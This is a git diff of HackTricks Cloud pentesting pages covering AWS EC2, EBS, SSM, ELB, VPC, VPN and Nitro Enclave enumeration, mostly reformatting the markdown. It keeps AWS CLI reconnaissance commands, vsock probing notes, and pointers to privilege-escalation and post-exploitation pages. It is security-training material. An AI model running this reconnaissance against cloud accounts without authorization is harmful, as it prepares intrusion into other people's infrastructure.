- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## VPC & Networking Learn what a VPC is and about its components in: -{% content-ref url="aws-vpc-and-networking-basic-information.md" %} -[aws-vpc-and-networking-basic-information.md](aws-vpc-and-networking-basic-information.md) -{% endcontent-ref %} +{{#ref}} +aws-vpc-and-networking-basic-information.md +{{#endref}} ## EC2 @@ -29,16 +16,16 @@ Amazon EC2 is utilized for initiating **virtual servers**. It allows for the con Interesting things to enumerate in EC2: -* Virtual Machines - * SSH Keys - * User Data - * Existing EC2s/AMIs/Snapshots -* Networking - * Networks - * Subnetworks - * Public IPs - * Open ports -* Integrated connections with other networks outside AWS +- Virtual Machines + - SSH Keys + - User Data + - Existing EC2s/AMIs/Snapshots +- Networking + - Networks + - Subnetworks + - Public IPs + - Open ports +- Integrated connections with other networks outside AWS ### Instance Profiles @@ -50,7 +37,9 @@ This extra step is the **creation of an** [_**instance profile**_](https://docs. AWS EC2 metadata is information about an Amazon Elastic Compute Cloud (EC2) instance that is available to the instance at runtime. This metadata is used to provide information about the instance, such as its instance ID, the availability zone it is running in, the IAM role associated with the instance, and the instance's hostname. -{% embed url="https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf" %} +{{#ref}} +https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf +{{#endref}} ### Enumeration @@ -85,7 +74,7 @@ aws ec2 describe-snapshots --owner-ids self aws ec2 describe-scheduled-instances # Get custom images -aws ec2 describe-images --owners self +aws ec2 describe-images --owners self # Get Elastic IPs aws ec2 describe-addresses 
@@ -96,7 +85,7 @@ aws ec2 get-console-output --instance-id [id] # Get VPN customer gateways aws ec2 describe-customer-gateways aws ec2 describe-vpn-gateways -aws ec2 describe-vpn-connections +aws ec2 describe-vpn-connections # List conversion tasks to upload/download VMs aws ec2 describe-conversion-tasks @@ -118,7 +107,7 @@ aws ec2 describe-key-pairs aws ec2 describe-internet-gateways # Get NAT Gateways -aws ec2 describe-nat-gateways +aws ec2 describe-nat-gateways # Get subnetworks aws ec2 describe-subnets @@ -136,29 +125,29 @@ aws ec2 describe-network-interfaces aws ec2 describe-route-tables # Get VPCs -aws ec2 describe-vpcs +aws ec2 describe-vpcs aws ec2 describe-vpc-peering-connections ``` ### Unauthenticated Access -{% content-ref url="../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md" %} -[aws-ec2-unauthenticated-enum.md](../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md) -{% endcontent-ref %} +{{#ref}} +../../aws-unauthenticated-enum-access/aws-ec2-unauthenticated-enum.md +{{#endref}} ### Privesc In the following page you can check how to **abuse EC2 permissions to escalate privileges**: -{% content-ref url="../../aws-privilege-escalation/aws-ec2-privesc.md" %} -[aws-ec2-privesc.md](../../aws-privilege-escalation/aws-ec2-privesc.md) -{% endcontent-ref %} +{{#ref}} +../../aws-privilege-escalation/aws-ec2-privesc.md +{{#endref}} ### Post-Exploitation -{% content-ref url="../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/" %} -[aws-ec2-ebs-ssm-and-vpc-post-exploitation](../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-ec2-ebs-ssm-and-vpc-post-exploitation/ +{{#endref}} ## EBS 
@@ -174,9 +163,9 @@ An **AMI** is used to **launch an EC2 instance**, while an EC2 **Snapshot** is u In the following page you can check how to **abuse EBS permissions to escalate privileges**: -{% content-ref url="../../aws-privilege-escalation/aws-ebs-privesc.md" %} -[aws-ebs-privesc.md](../../aws-privilege-escalation/aws-ebs-privesc.md) -{% endcontent-ref %} +{{#ref}} +../../aws-privilege-escalation/aws-ebs-privesc.md +{{#endref}} ## SSM @@ -207,9 +196,9 @@ ps aux | grep amazon-ssm In the following page you can check how to **abuse SSM permissions to escalate privileges**: -{% content-ref url="../../aws-privilege-escalation/aws-ssm-privesc.md" %} -[aws-ssm-privesc.md](../../aws-privilege-escalation/aws-ssm-privesc.md) -{% endcontent-ref %} +{{#ref}} +../../aws-privilege-escalation/aws-ssm-privesc.md +{{#endref}} ## ELB @@ -232,7 +221,6 @@ aws elbv2 describe-listeners --load-balancer-arn ### Enumeration -{% code overflow="wrap" %} ```bash # Launch templates aws ec2 describe-launch-templates @@ -247,7 +235,6 @@ aws autoscaling describe-launch-configurations aws autoscaling describe-load-balancer-target-groups aws autoscaling describe-load-balancers ``` -{% endcode %} ## Nitro @@ -255,9 +242,9 @@ AWS Nitro is a suite of **innovative technologies** that form the underlying pla Get more information and how to enumerate it from: -{% content-ref url="aws-nitro-enum.md" %} -[aws-nitro-enum.md](aws-nitro-enum.md) -{% endcontent-ref %} +{{#ref}} +aws-nitro-enum.md +{{#endref}} ## VPN 
@@ -266,25 +253,25 @@ A VPN allows to connect your **on-premise network (site-to-site VPN)** or the ** #### Basic AWS VPN Components 1. **Customer Gateway**: - * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. + - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. + - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. + - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. + - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. 2. **Virtual Private Gateway**: - * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - * It is attached to your VPC and serves as the target for your VPN connection. - * VPG is the AWS side endpoint for the VPN connection. - * It handles the secure communication between your VPC and your on-premises network. + - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. + - It is attached to your VPC and serves as the target for your VPN connection. + - VPG is the AWS side endpoint for the VPN connection. + - It handles the secure communication between your VPC and your on-premises network. 3. **Site-to-Site VPN Connection**: - * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. 
- * This type of connection requires a Customer Gateway and a Virtual Private Gateway. - * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. + - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. + - This type of connection requires a Customer Gateway and a Virtual Private Gateway. + - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. + - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. 4. **Client VPN Endpoint**: - * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - * With Client VPN, each client device uses a VPN client software to establish a secure connection. + - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. + - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. + - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. + - With Client VPN, each client device uses a VPN client software to establish a secure connection. You can [**find more information about the benefits and components of AWS VPNs here**](aws-vpc-and-networking-basic-information.md#vpn). 
@@ -328,25 +315,12 @@ If a **VPN connection was stablished** you should search for **`.opvn`** config #### **Post Exploitaiton** -{% content-ref url="../../aws-post-exploitation/aws-vpn-post-exploitation.md" %} -[aws-vpn-post-exploitation.md](../../aws-post-exploitation/aws-vpn-post-exploitation.md) -{% endcontent-ref %} +{{#ref}} +../../aws-post-exploitation/aws-vpn-post-exploitation.md +{{#endref}} ## References -* [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) +- [https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html](https://docs.aws.amazon.com/batch/latest/userguide/getting-started-ec2.html) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md similarity index 76% rename from pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md index 2e40121df..0c37fd609 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-nitro-enum.md @@ -1,19 +1,6 @@ # AWS - Nitro Enum -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## Basic Information @@ -23,9 +10,8 @@ AWS Nitro is a suite of **innovative technologies** that form the underlying pla **AWS Nitro Enclaves** provides a secure, **isolated compute environment within Amazon EC2 instances**, specifically designed for processing highly sensitive data. Leveraging the AWS Nitro System, these enclaves ensure robust **isolation and security**, ideal for **handling confidential information** such as PII or financial records. They feature a minimalist environment, significantly reducing the risk of data exposure. Additionally, Nitro Enclaves support cryptographic attestation, allowing users to verify that only authorized code is running, crucial for maintaining strict compliance and data protection standards. -{% hint style="danger" %} -Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. -{% endhint %} +> [!CAUTION] +> Nitro Enclave images are **run from inside EC2 instances** and you cannot see from the AWS web console if an EC2 instances is running images in Nitro Enclave or not. ## Nitro Enclave CLI installation @@ -82,13 +68,11 @@ As per [**the documentation**](https://catalog.us-east-1.prod.workshops.aws/even /etc/nitro_enclaves/allocator.yaml ``` -{% hint style="danger" %} -Always remember that you need to **reserve some resources for the parent EC2** instance also! -{% endhint %} +> [!CAUTION] +> Always remember that you need to **reserve some resources for the parent EC2** instance also! After knowing the resources to give to an image and even having modified the configuration file it's possible to run an enclave image with: -{% code overflow="wrap" %} ```shell # Restart the service so the new default values apply sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable nitro-enclaves-allocator.service 
@@ -96,7 +80,6 @@ sudo systemctl start nitro-enclaves-allocator.service && sudo systemctl enable n # Indicate the CPUs and memory to give nitro-cli run-enclave --cpu-count 2 --memory 3072 --eif-path hello.eif --debug-mode --enclave-cid 16 ``` -{% endcode %} ### Enumerate Enclaves @@ -127,9 +110,8 @@ The only way to communicate with an **enclave** running image is using **vsocks* **Virtual Socket (vsock)** is a socket family in Linux specifically designed to facilitate **communication** between virtual machines (**VMs**) and their **hypervisors**, or between VMs **themselves**. Vsock enables efficient, **bi-directional communication** without relying on the host's networking stack. This makes it possible for VMs to communicate even without network configurations, **using a 32-bit Context ID (CID) and port numbers** to identify and manage connections. The vsock API supports both stream and datagram socket types, similar to TCP and UDP, providing a versatile tool for user-level applications in virtual environments. -{% hint style="success" %} -Therefore, an vsock address looks like this: `:` -{% endhint %} +> [!TIP] +> Therefore, an vsock address looks like this: `:` To find **CIDs** of the enclave running images you could just execute the following cmd and thet the **`EnclaveCID`**: 
@@ -159,15 +141,14 @@ To find **CIDs** of the enclave running images you could just execute the follow ] -{% hint style="warning" %} -Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). -{% endhint %} +> [!WARNING] +> Note that from the host there isn't any way to know if a CID is exposing any port! Unless using some **vsock port scanner like** [**https://github.com/carlospolop/Vsock-scanner**](https://github.com/carlospolop/Vsock-scanner). ### Vsock Server/Listener Find here a couple of examples: -* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py) +- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/server.py)
@@ -176,7 +157,7 @@ Find here a couple of examples: ```python #!/usr/bin/env python3 -# From +# From https://medium.com/@F.DL/understanding-vsock-684016cf0eb0 import socket @@ -210,7 +191,7 @@ socat VSOCK-LISTEN:,fork EXEC:"echo Hello from server!" Examples: -* [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py) +- [https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py](https://github.com/aws-samples/aws-nitro-enclaves-workshop/blob/main/resources/code/my-first-enclave/secure-local-channel/client.py)
@@ -251,17 +232,15 @@ This will forward the **local port 8001 in vsock** to `ip-ranges.amazonaws.com:4 ```yaml allowlist: -- {address: ip-ranges.amazonaws.com, port: 443} + - { address: ip-ranges.amazonaws.com, port: 443 } ``` It's possible to see the vsock addresses (**`:`**) used by the EC2 host with (note the `3:8001`, 3 is the CID and 8001 the port): -{% code overflow="wrap" %} ```bash sudo ss -l -p -n | grep v_str -v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) +v_str LISTEN 0 0 3:8001 *:* users:(("vsock-proxy",pid=9458,fd=3)) ``` -{% endcode %} ## Nitro Enclave Atestation & KMS @@ -273,9 +252,8 @@ From the [**docs**](https://catalog.us-east-1.prod.workshops.aws/event/dashboard You can integrate **cryptographic attestation** into your applications and leverage pre-built integrations with services like **AWS KMS**. AWS KMS can **validate enclave attestations** and offers attestation-based condition keys (`kms:RecipientAttestation:ImageSha384` and `kms:RecipientAttestation:PCR`) in its key policies. These policies ensure that AWS KMS permits operations using the KMS key **only if the enclave's attestation document is valid** and meets the **specified conditions**. -{% hint style="success" %} -Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. -{% endhint %} +> [!TIP] +> Note that Enclaves in debug (--debug) mode generate attestation documents with PCRs that are made of zeros (`000000000000000000000000000000000000000000000000`). Therefore, KMS policies checking these values will fail. ### PCR Bypass 
@@ -287,20 +265,7 @@ The research on how to modify/create new images to bypass each protection (spcia ## References -* [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) -* All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) +- [https://medium.com/@F.DL/understanding-vsock-684016cf0eb0](https://medium.com/@F.DL/understanding-vsock-684016cf0eb0) +- All the parts of the Nitro tutorial from AWS: [https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli](https://catalog.us-east-1.prod.workshops.aws/event/dashboard/en-US/workshop/1-my-first-enclave/1-1-nitro-enclaves-cli) -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} diff --git a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md similarity index 63% rename from pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md rename to src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md index 2f490c3e8..08abe0d21 100644 --- a/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum/aws-vpc-and-networking-basic-information.md @@ -1,19 +1,6 @@ # AWS - VPC & Networking Basic Information -{% hint style="success" %} -Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\ -Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte) - -
- -Support HackTricks - -* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)! -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks_live)**.** -* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
-{% endhint %} +{{#include ../../../../banners/hacktricks-training.md}} ## AWS Networking in a Nutshell @@ -27,14 +14,14 @@ Therefore, a **security group** will limit the exposed ports of the network **in Moreover, in order to **access Internet**, there are some interesting configurations to check: -* A **subnetwork** can **auto-assign public IPv4 addresses** -* An **instance** created in the network that **auto-assign IPv4 addresses can get one** -* An **Internet gateway** need to be **attached** to the **VPC** - * You could also use **Egress-only internet gateways** -* You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. - * The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) +- A **subnetwork** can **auto-assign public IPv4 addresses** +- An **instance** created in the network that **auto-assign IPv4 addresses can get one** +- An **Internet gateway** need to be **attached** to the **VPC** + - You could also use **Egress-only internet gateways** +- You could also have a **NAT gateway** in a **private subnet** so it's possible to **connect to external services** from that private subnet, but it's **not possible to reach them from the outside**. + - The NAT gateway can be **public** (access to the internet) or **private** (access to other VPCs) -![](<../../../../.gitbook/assets/image (274).png>) +![](<../../../../images/image (274).png>) ## VPC 
@@ -44,10 +31,10 @@ Amazon **Virtual Private Cloud** (Amazon VPC) enables you to **launch AWS resour Subnets helps to enforce a greater level of security. **Logical grouping of similar resources** also helps you to maintain an **ease of management** across your infrastructure. -* Valid CIDR are from a /16 netmask to a /28 netmask. -* A subnet cannot be in different availability zones at the same time. -* **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. -* It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.** +- Valid CIDR are from a /16 netmask to a /28 netmask. +- A subnet cannot be in different availability zones at the same time. +- **AWS reserves the first three host IP addresses** of each subnet **for** **internal AWS usage**: he first host address used is for the VPC router. The second address is reserved for AWS DNS and the third address is reserved for future use. +- It's called **public subnets** to those that have **direct access to the Internet, whereas private subnets do not.**
@@ -57,11 +44,11 @@ Subnets helps to enforce a greater level of security. **Logical grouping of simi Route tables determine the traffic routing for a subnet within a VPC. They determine which network traffic is forwarded to the internet or to a VPN connection. You will usually find access to the: -* Local VPC -* NAT -* Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). - * In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. -* VPC endpoints (to access S3 from private networks) +- Local VPC +- NAT +- Internet Gateways / Egress-only Internet gateways (needed to give a VPC access to the Internet). + - In order to make a subnet public you need to **create** and **attach** an **Internet gateway** to your VPC. +- VPC endpoints (to access S3 from private networks) In the following images you can check the differences in a default public network and a private one: @@ -73,8 +60,8 @@ In the following images you can check the differences in a default public networ **Network Access Control Lists (ACLs)**: Network ACLs are firewall rules that control incoming and outgoing network traffic to a subnet. They can be used to allow or deny traffic to specific IP addresses or ranges. -* It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections -* However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed +- It’s most frequent to allow/deny access using security groups, but this is only way to completely cut established reverse shells. A modified rule in a security groups doesn’t stop already established connections +- However, this apply to the whole subnetwork be careful when forbidding stuff because needed functionality might be disturbed ### Security Groups 
@@ -111,13 +98,13 @@ Unlike S3 access logs and CloudFront access logs, the **log data generated by VP Limitations: -* If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. -* If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces -* Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. -* The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. -* Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. -* Traffic relating to an Amazon Windows activation license from a Windows instance -* Traffic between a network load balancer interface and an endpoint network interface +- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. +- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces +- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. +- The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. +- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. 
+- Traffic relating to an Amazon Windows activation license from a Windows instance +- Traffic between a network load balancer interface and an endpoint network interface For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. 
@@ -126,47 +113,48 @@ For every network interface that publishes data to the CloudWatch log group, it ### Basic AWS VPN Components 1. **Customer Gateway**: - * A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - * It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - * You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - * It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. + - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. + - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. + - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. + - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. 2. **Virtual Private Gateway**: - * A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - * It is attached to your VPC and serves as the target for your VPN connection. - * VPG is the AWS side endpoint for the VPN connection. - * It handles the secure communication between your VPC and your on-premises network. + - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. + - It is attached to your VPC and serves as the target for your VPN connection. + - VPG is the AWS side endpoint for the VPN connection. + - It handles the secure communication between your VPC and your on-premises network. 3. **Site-to-Site VPN Connection**: - * A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. 
- * This type of connection requires a Customer Gateway and a Virtual Private Gateway. - * It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - * Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. + - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. + - This type of connection requires a Customer Gateway and a Virtual Private Gateway. + - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. + - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. 4. **Client VPN Endpoint**: - * A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. - * It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - * It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - * With Client VPN, each client device uses a VPN client software to establish a secure connection. + - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. + - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. + - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. + - With Client VPN, each client device uses a VPN client software to establish a secure connection. ### Site-to-Site VPN **Connect your on premisses network with your VPC.** -* **VPN connection**: A secure connection between your on-premises equipment and your VPCs. 
-* **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. +- **VPN connection**: A secure connection between your on-premises equipment and your VPCs. +- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. - Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. -* **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. -* **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. -* **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. -* **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. + Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. + +- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. +- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. +- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. +- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. #### Limitations -* IPv6 traffic is not supported for VPN connections on a virtual private gateway. 
-* An AWS VPN connection does not support Path MTU Discovery. +- IPv6 traffic is not supported for VPN connections on a virtual private gateway. +- An AWS VPN connection does not support Path MTU Discovery. In addition, take the following into consideration when you use Site-to-Site VPN. -* When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. +- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. ### Client VPN 
